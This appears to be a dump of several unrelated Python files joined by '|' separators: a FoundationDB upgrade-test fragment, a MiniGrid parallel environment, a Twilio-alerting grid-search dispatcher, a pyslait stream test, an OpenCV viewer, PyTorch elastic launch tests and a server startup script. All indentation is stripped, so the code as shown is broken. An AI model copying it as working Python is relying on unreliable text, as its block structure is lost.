with UpgradeTest(args.build_dir, args.upgrade_path, args.process_number) as test:
print("log-dir: {}".format(test.log))
print("etc-dir: {}".format(test.etc))
print("data-dir: {}".format(test.data))
print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster")))
errcode = test.exec_test(args)
if not test.check_cluster_logs():
errcode = 1 if errcode == 0 else errcode
test.dump_warnings_in_logs()
if errcode != 0 and not args.disable_log_dump:
test.dump_cluster_logs()
sys.exit(errcode)
|
penv.py
|
import gym
from gym_minigrid.minigrid import OBJECT_TO_IDX, COLOR_TO_IDX
from multiprocessing import Process, Pipe
def get_global(env, obs):
# get global view
grid = env.grid
# position agent
x, y = env.agent_pos
# rotate to match agent's orientation
for i in range(env.agent_dir + 1):
# rotate grid
grid = grid.rotate_left()
# rotate position of agent
x_new = y
y_new = grid.height - 1 - x
x = x_new
y = y_new
# encode image for model
image = grid.encode()
# overlap global with receiver observation, i.e., include carried objects
image[x, y, :] = obs["image"][3, 6, :]
# indicate position of agent
image[x, y, 0] += 10
return image
def get_local(obs):
# get local view
return obs["image"][3:4, 5:7, :]
def get_agent_loc(env):
# get global view
grid = env.grid
# position agent
x, y = env.agent_pos
# rotate to match agent's orientation
for i in range(env.agent_dir + 1):
# rotate position of agent
x_new = y
y_new = grid.height - 1 - x
x = x_new
y = y_new
agent_x = x
agent_y = y
return agent_x, agent_y
def get_goal(env):
goal_type = OBJECT_TO_IDX[env.instrs.desc.type]
goal_color = COLOR_TO_IDX[env.instrs.desc.color]
return goal_type, goal_color
def get_goal_loc(globs):
x, y = (( 3 < globs["image"][:, :, 0]) * (globs["image"][:, :, 0] < 8) +
(13 < globs["image"][:, :, 0]) * (globs["image"][:, :, 0] < 18)).nonzero()
goal_x = x[0]
goal_y = y[0]
return goal_x, goal_y
def reset(env, n, conventional, archimedean, informed_sender):
obs = env.reset()
active_sender = env.step_count % n == 0
active_receiver = not active_sender
active = (active_sender, active_receiver)
acting = (False, active_receiver)
sending = (active_sender, False)
globs = obs.copy()
globs["image"] = get_global(env, obs)
obs["image"] = get_local(obs)
obss = (globs, obs) if not archimedean else (obs, globs)
if not informed_sender:
obss[0]["mission"] = "unknown"
agent_x, agent_y = get_agent_loc(env)
goal_type, goal_color = get_goal(env)
goal_x, goal_y = get_goal_loc(globs)
extra = (agent_x, agent_y, goal_type, goal_color, goal_x, goal_y)
return active, acting, sending, obss, extra
def step(env, n, conventional, archimedean, informed_sender, action, prev_result):
if prev_result[0][1]:
# receiver's frame
obs, reward, done, info = env.step(action)
done = done or 64 <= env.step_count
if done:
obs = env.reset()
active_sender = True if conventional else env.step_count % n == 0
active_receiver = not active_sender
active = (active_sender, active_receiver)
acting = (False, active_receiver)
sending = (env.step_count % n == 0, False) if conventional else (active_sender, False)
globs = obs.copy()
globs["image"] = get_global(env, obs)
obs["image"] = get_local(obs)
obss = (globs, obs) if not archimedean else (obs, globs)
if not informed_sender:
obss[0]["mission"] = "unknown"
agent_x, agent_y = get_agent_loc(env)
goal_type, goal_color = get_goal(env)
goal_x, goal_y = get_goal_loc(globs)
extra = (agent_x, agent_y, goal_type, goal_color, goal_x, goal_y)
else:
# sender's frame
reward = 0.0
done = False
active_sender = False
active_receiver = not active_sender
active = (active_sender, active_receiver)
acting = (False, active_receiver)
sending = (active_sender, False)
obss = prev_result[3]
extra = prev_result[4]
return active, acting, sending, obss, extra, reward, done
def worker(conn, env, n, conventional, archimedean, informed_sender):
while True:
cmd, action, prev_result = conn.recv()
if cmd == "step":
conn.send(step(env, n, conventional, archimedean, informed_sender, action, prev_result))
elif cmd == "reset":
conn.send(reset(env, n, conventional, archimedean, informed_sender))
else:
raise NotImplementedError
class ParallelEnv(gym.Env):
"""A concurrent execution of environments in multiple processes."""
def __init__(self, env, n, conventional, archimedean, informed_sender):
assert len(env) >= 1, "No environment given."
self.env = env
self.num_procs = len(env)
self.n = n
self.conventional = conventional
self.archimedean = archimedean
self.informed_sender = informed_sender
self.observation_space = self.env[0].observation_space
self.action_space = self.env[0].action_space
self.locals = []
self.processes = []
for i, env in enumerate(self.env[1:]):
local, remote = Pipe()
self.locals.append(local)
p = Process(target=worker, args=(remote, env, n, conventional, archimedean, informed_sender))
p.daemon = True
p.start()
remote.close()
self.processes.append(p)
def reset(self):
for local in self.locals:
local.send(("reset", None, None))
self.prev_results = [reset(self.env[0], self.n, self.conventional, self.archimedean, self.informed_sender)] + [local.recv() for local in self.locals]
return zip(*self.prev_results)
def step(self, actions):
for local, action, prev_result in zip(self.locals, actions[1:, 1], self.prev_results[1:]):
local.send(("step", action, prev_result))
self.prev_results = [step(self.env[0], self.n, self.conventional, self.archimedean, self.informed_sender, actions[0, 1], self.prev_results[0])] + [local.recv() for local in self.locals]
return zip(*self.prev_results)
def render(self):
raise NotImplementedError
def __del__(self):
for p in self.processes:
p.terminate()
|
dispatcher.py
|
import argparse
import subprocess
import os
import multiprocessing
import pickle
import csv
from twilio.rest import Client
import json
import sys
from os.path import dirname, realpath
sys.path.append(dirname(dirname(realpath(__file__))))
import rationale_net.utils.parsing as parsing
EXPERIMENT_CRASH_MSG = "ALERT! job:[{}] has crashed! Check logfile at:[{}]"
CONFIG_NOT_FOUND_MSG = "ALERT! {} config {} file does not exist!"
RESULTS_PATH_APPEAR_ERR = 'results_path should not appear in config. It will be determined automatically per job'
SUCESSFUL_SEARCH_STR = "SUCCESS! Grid search results dumped to {}. Best dev loss: {}, dev accuracy: {:.3f}"
RESULT_KEY_STEMS = ['{}_loss', '{}_obj_loss', '{}_k_selection_loss',
'{}_k_continuity_loss','{}_accuracy']
LOG_KEYS = ['results_path', 'model_path', 'log_path']
SORT_KEY = 'dev_loss'
parser = argparse.ArgumentParser(description='OncoNet Grid Search Dispatcher. For use information, see `doc/README.md`')
parser.add_argument("--experiment_config_path", required=True, type=str, help="Path of experiment config")
parser.add_argument("--alert_config_path", type=str, default='configs/alert_config.json', help="Path of alert config")
parser.add_argument('--log_dir', type=str, default="logs", help="path to store logs and detailed job level result files")
parser.add_argument('--result_path', type=str, default="results/grid_search.csv", help="path to store grid_search table. This is preferably on shared storage")
parser.add_argument('--rerun_experiments', action='store_true', default=False, help='whether to rerun experiments with the same result file location')
def send_text_msg(msg, alert_config, twilio_config):
'''
Send a text message using twilio acct specified twilio conf to numbers
specified in alert_conf.
If suppress_alerts is turned on, do nothing
:msg: - body of text message
:alert_config: - dictionary with a list fo numbers to send message to
:twilio-config: - dictionary with twilio SID, TOKEN, and phone number
'''
if alert_config['suppress_alerts']:
return
client = Client(twilio_config['ACCOUNT_SID'], twilio_config['AUTH_TOKEN'])
for number in [alert_config['alert_nums']]:
client.messages.create(
to=number, from_=twilio_config['twilio_num'], body=msg)
def launch_experiment(gpu, flag_string, alert_conf, twilio_conf):
'''
Launch an experiment and direct logs and results to a unique filepath.
Alert of something goes wrong.
:gpu: gpu to run this machine on.
:flag_string: flags to use for this model run. Will be fed into
scripts/main.py
'''
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
log_name = parsing.md5(flag_string)
log_stem = os.path.join(args.log_dir, log_name)
log_path = '{}.txt'.format(log_stem)
results_path = "{}.results".format(log_stem)
experiment_string = "CUDA_VISIBLE_DEVICES={} python -u scripts/main.py {} --results_path {}".format(
gpu, flag_string, results_path)
# forward logs to logfile
shell_cmd = "{} > {} 2>&1".format(experiment_string, log_path)
print("Lauched exp: {}".format(shell_cmd))
if not os.path.exists(results_path) or args.rerun_experiments:
subprocess.call(shell_cmd, shell=True)
if not os.path.exists(results_path):
# running this process failed, alert me
job_fail_msg = EXPERIMENT_CRASH_MSG.format(experiment_string, log_path)
send_text_msg(job_fail_msg, alert_conf, twilio_conf)
return results_path, log_path
def worker(gpu, job_queue, done_queue, alert_config, twilio_config):
'''
Worker thread for each gpu. Consumes all jobs and pushes results to done_queue.
:gpu - gpu this worker can access.
:job_queue - queue of available jobs.
:done_queue - queue where to push results.
'''
while not job_queue.empty():
params = job_queue.get()
if params is None:
return
done_queue.put(
launch_experiment(gpu, params, alert_config, twilio_config))
if __name__ == "__main__":
args = parser.parse_args()
if not os.path.exists(args.experiment_config_path):
print(CONFIG_NOT_FOUND_MSG.format("experiment", args.experiment_config_path))
sys.exit(1)
experiment_config = json.load(open(args.experiment_config_path, 'r'))
if 'results_path' in experiment_config['search_space']:
print (RESULTS_PATH_APPEAR_ERR)
sys.exit(1)
if not os.path.exists(args.alert_config_path):
print(CONFIG_NOT_FOUND_MSG.format("alert", args.alert_config_path))
sys.exit(1)
alert_config = json.load(open(args.alert_config_path, 'r'))
twilio_conf_path = alert_config['path_to_twilio_secret']
if not os.path.exists(twilio_conf_path):
print(CONFIG_NOT_FOUND_MSG.format("twilio", twilio_conf_path))
twilio_config = None
if not alert_config['suppress_alerts']:
twilio_config = json.load(open(twilio_conf_path, 'r'))
job_list, experiment_axies = parsing.parse_dispatcher_config(experiment_config)
job_queue = multiprocessing.Queue()
done_queue = multiprocessing.Queue()
for job in job_list:
job_queue.put(job)
print("Launching Dispatcher with {} jobs!".format(len(job_list)))
print()
for gpu in experiment_config['available_gpus']:
print("Start gpu worker {}".format(gpu))
multiprocessing.Process(target=worker, args=(gpu, job_queue, done_queue, alert_config, twilio_config)).start()
print()
summary = []
result_keys = []
for mode in ['train','dev','test']:
result_keys.extend( [k.format(mode) for k in RESULT_KEY_STEMS ])
for _ in range(len(job_list)):
result_path, log_path = done_queue.get()
assert result_path is not None
try:
result_dict = pickle.load(open(result_path, 'rb'))
except Exception as e:
print("Experiment failed! Logs are located at: {}".format(log_path))
continue
result_dict['log_path'] = log_path
# Get results from best epoch and move to top level of results dict
best_epoch_indx = result_dict['epoch_stats']['best_epoch']
present_result_keys = []
for k in result_keys:
if (k in result_dict['test_stats'] and len(result_dict['test_stats'][k])>0) or (k in result_dict['epoch_stats'] and len(result_dict['epoch_stats'][k])>0):
present_result_keys.append(k)
if 'test' in k:
result_dict[k] = result_dict['test_stats'][k][0]
else:
result_dict[k] = result_dict['epoch_stats'][k][best_epoch_indx]
summary_columns = experiment_axies + present_result_keys + LOG_KEYS
# Only export keys we want to see in sheet to csv
summary_dict = {}
for key in summary_columns:
summary_dict[key] = result_dict[key]
summary.append(summary_dict)
summary = sorted(summary, key=lambda k: k[SORT_KEY])
dump_result_string = SUCESSFUL_SEARCH_STR.format(
args.result_path, summary[0]['dev_loss'], summary[0]['dev_accuracy']
)
# Write summary to csv
with open(args.result_path, 'w') as out_file:
writer = csv.DictWriter(out_file, fieldnames=summary_columns)
writer.writeheader()
for experiment in summary:
writer.writerow(experiment)
print(dump_result_string)
send_text_msg(dump_result_string, alert_config, twilio_config)
|
stream.py
|
slait_server = "http://192.168.220.128:5994/"
# slait_server = "http://127.0.0.1:5994/"
def subscriber_test():
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import pyslait
sc = pyslait.StreamClient(slait_server)
@sc.onCtrl("lobs","BTC")
def on_ctrl(streamClient, msg):
print('Got[lobs/BTC] ctrl cmd:', msg)
@sc.onData("lobs","BTC")
def on_data(streamClient, msg):
print('Got BTC data:', msg)
@sc.onData("lobs","ETH")
def on_data(streamClient, msg):
print('Got ETH data:', msg)
sc.runsub("lobs",["BTC","ETH"])
def publisher_test():
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import pyslait
from datetime import datetime, timedelta
sc = pyslait.StreamClient(slait_server)
def dgen():
n = datetime.now()
l = list()
for i in range(1,5):
d = dict()
d['Data'] = str(i)
d['Timestamp'] = pyslait.client.datestring(n+timedelta(seconds=5*i))
l.append(d)
return l
@sc.onCtrl("lobs","BTC")
def on_ctrl(streamClient, msg):
if msg == pyslait.data.CtrlMessage.PUB_READY:
l = dgen()
sc.publish("lobs", "BTC", l)
print('Publish[lobs/BTC] :', l)
else:
print('Got[lobs/BTC] ctrl cmd:', msg)
sc.runpub("lobs","BTC")
def subpub_test():
from os import sys, path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import threading
import time
s = threading.Thread(target=subscriber_test)
p = threading.Thread(target=publisher_test)
s.setDaemon(True)
p.setDaemon(True)
s.start()
print('Subscriber started...')
time.sleep(3)
p.start()
print('Publisher started...')
time.sleep(10)
if __name__ == '__main__' and not __package__:
# subscriber_test()
# publisher_test()
subpub_test()
|
random.py
|
import os
import cv2
import sys
import threading
thread_started = False
def thread():
global thread_started
print(thread_started)
# Making a new window and setting its properties
cv2.namedWindow('Image', cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("Image", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# Loading the image
currentDirectory = os.path.abspath(os.path.dirname(sys.argv[0]))
imagepath = os.path.join(currentDirectory, 'Images/DSC02055.JPG')
print(imagepath)
img = cv2.imread(imagepath, cv2.IMREAD_UNCHANGED)
# Showing the image
while True:
cv2.imshow('Image', img)
if cv2.waitKey(0) == ord('q'):
# Closing and exciting with "q"
break
# Closing all open OpenCV windows
cv2.destroyAllWindows()
thread_started = False
loops = 1
while True:
if not thread_started:
print('Starting Thread')
thread = threading.Thread(target=thread)
thread_started = True
thread.start()
# End after 3 times
loops += 1
if loops > 3:
break
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import runpy
import shutil
import subprocess
import sys
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.distributed.elastic.utils.distributed import get_free_port
from torch.testing._internal.common_utils import (
TEST_WITH_DEV_DBG_ASAN,
sandcastle_skip_if,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
self._test_launch_user_script_python()
def _test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_default_nproc(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
world_size = 1
args = [
f"--nnodes={nnodes}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "spawn"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails and lancher raieses exception
to indicate that worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_run_path(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
"--run_path",
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertTrue(min_nodes, max_nodes)
self.assertTrue(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertTrue(2, min_nodes)
self.assertTrue(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_is_torchelastic_launched(self):
# launch test script with torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns True
out_file = f"{os.path.join(self.test_dir, 'out')}"
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=1",
"--monitor_interval=1",
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
]
)
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("True", is_torchelastic_launched)
def test_is_not_torchelastic_launched(self):
# launch test script without torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns False
out_file = f"{os.path.join(self.test_dir, 'out')}"
# need to run the script with runpy in the same interpreter
# as the test because otherwise (depending on the environment)
# it will not find torch as a dependency
with patch.object(
sys,
"argv",
[
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("False", is_torchelastic_launched)
def test_init_method_tcp(self):
port = get_free_port()
with patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
"--rank=0",
"--world_size=1",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_tcp_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
]
)
# nothing to validate, just make sure it runs
def test_init_method_env(self):
port = get_free_port()
with patch.dict(
os.environ,
{
"RANK": "0",
"WORLD_SIZE": "1",
"MASTER_ADDR": "localhost",
"MASTER_PORT": str(port),
},
), patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
"--init_method=env://",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_env_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
"--init_method=env://",
]
)
# nothing to validate, just make sure it runs
def test_get_default_executable(self):
self.assertEqual(sys.executable, launch.get_executable())
|
main.py
|
from threading import Thread
from critical_watcher import criticalWatcher
from audio import updatePos
from connections import *
from user_functions import *
import console
import server
import variables
import sys
import traceback
console.initLogger()
# not that magic consts
server_port = int(sys.argv[1])
controller_server_port = int(sys.argv[2])
CLIENT_STATUS_UPDATER_INTERVAL = 1
log().info(f"Starting server on port {server_port}, {controller_server_port}")
# global variables initiation
variables._init()
variables.set("server_port", server_port)
variables.set("controller_server_port", controller_server_port)
variables.set("isplaying", 0)
variables.set("url", "None")
variables.set("songpos", "None")
variables.set("songlen", "None")
variables.set("stop", False)
variables.set("active_time", 5)
variables.set("last_controller_client", None)
# ok run it
thread_critical_watcher = Thread(target = criticalWatcher, name = "CriticalWatcherThread")
thread_player_timing = Thread(target = updatePos, name = "PlayerTimingThread")
thread_main_server = Thread(target = server.server, name = "MainServerThread", args = (server_port, ))
thread_controller_server = Thread(target = server.controller, name = "ControllerServerThread", args = (controller_server_port, ))
